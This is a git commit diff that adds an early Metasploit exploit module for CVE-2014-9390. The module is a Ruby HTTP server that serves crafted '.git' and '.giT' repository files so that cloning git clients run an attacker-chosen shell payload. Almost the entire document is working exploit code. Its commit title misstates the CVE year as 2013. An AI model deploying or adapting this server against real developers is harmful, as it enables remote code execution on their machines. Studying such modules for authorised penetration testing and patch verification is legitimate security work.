Initial commit of POC module for CVE-2013-9390 (rapid7#4435)

modules/exploits/multi/http/git_cve_2014_9390.rb

@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Malicious Git HTTP Server For CVE-2014-9390',
+      'Description' => '',
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
+      'References'     =>
+        [
+          ['CVE', '2014-9390'],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl ruby bash telnet',
+            }
+        },
+      'Platform'	=> 'osx',
+      'Targets'	=>
+        [
+          [
+            'Automatic',
+            {
+              'Platform' => [ 'unix' ],
+              'Arch'     => ARCH_CMD,
+            },
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 18 2014'))
+  end
+
+
+  def exploit
+    super
+  end
+
+  def on_request_uri(cli, req)
+    data_dir = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-9390")
+    req_file = URI.parse(req.uri).path.gsub(/^#{datastore['URIPATH']}/, '')
+
+    files = []
+    files << File.join(data_dir, '.git', req_file)
+    files << File.join(data_dir, '.giT', req_file)
+    found = false
+    files.each do |file|
+      if File.file?(file)
+        puts "File is #{file}"
+        send_response(cli, IO.read(file))
+        found = true
+        break
+      end
+    end
+
+    unless found
+      send_not_found(cli)
+    end
+  end
+end